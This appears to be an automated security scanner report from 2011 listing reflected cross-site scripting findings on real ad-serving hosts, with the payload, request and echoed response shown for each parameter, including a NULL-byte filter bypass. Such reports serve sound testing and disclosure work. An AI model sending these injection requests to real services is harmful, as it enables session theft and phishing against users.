Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f10a2<script>alert(1)</script>53d79e419f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal-sea; dp2=1; apnx=1; qcms=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; mmpg=1; targ=1; rdst11=1; qcdp=1;
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 86
Date: Tue, 08 Mar 2011 11:59:13 GMT
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c7a'-alert(1)-'d8ef1576c28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243d1'-alert(1)-'a765c13a6fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.8.52
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Mon, 07 Mar 2011 00:56:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:45 GMT
1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.merriamwebster/ron_010110
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload effe1'-alert(1)-'8cb31a19829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e194e'-alert(1)-'1da20828cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e36a2"-alert(1)-"60de33534d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7082
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:16:17 GMT
Expires: Mon, 07 Mar 2011 13:16:17 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... eHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e24"-alert(1)-"68e3df219f9 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:13:27 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:13:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225"); var fsc ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f8a5"-alert(1)-"9a5b399f5f2 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:40 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... i94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8293c"-alert(1)-"5a363da0fe6 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:14:10 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:14:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7191
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... EwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226"); var fscUrl = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acd0"-alert(1)-"583d7c1bf92 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7143
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599"); var fscUrl = url; var fscUrlClickTagFound = false; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0073ec1"-alert(1)-"252bbba8c84 was submitted in the sz parameter. This input was echoed as 73ec1"-alert(1)-"252bbba8c84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7060
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:12:56 GMT
Expires: Mon, 07 Mar 2011 13:12:56 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/7/1a9/%2a/m%3B234427573%3B0-0%3B0%3B50265527%3B3454-728/90%3B38432219/38449976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNv ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbfa'-alert(1)-'59510ce7fea was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:15 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6fcd'-alert(1)-'419279fa279 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
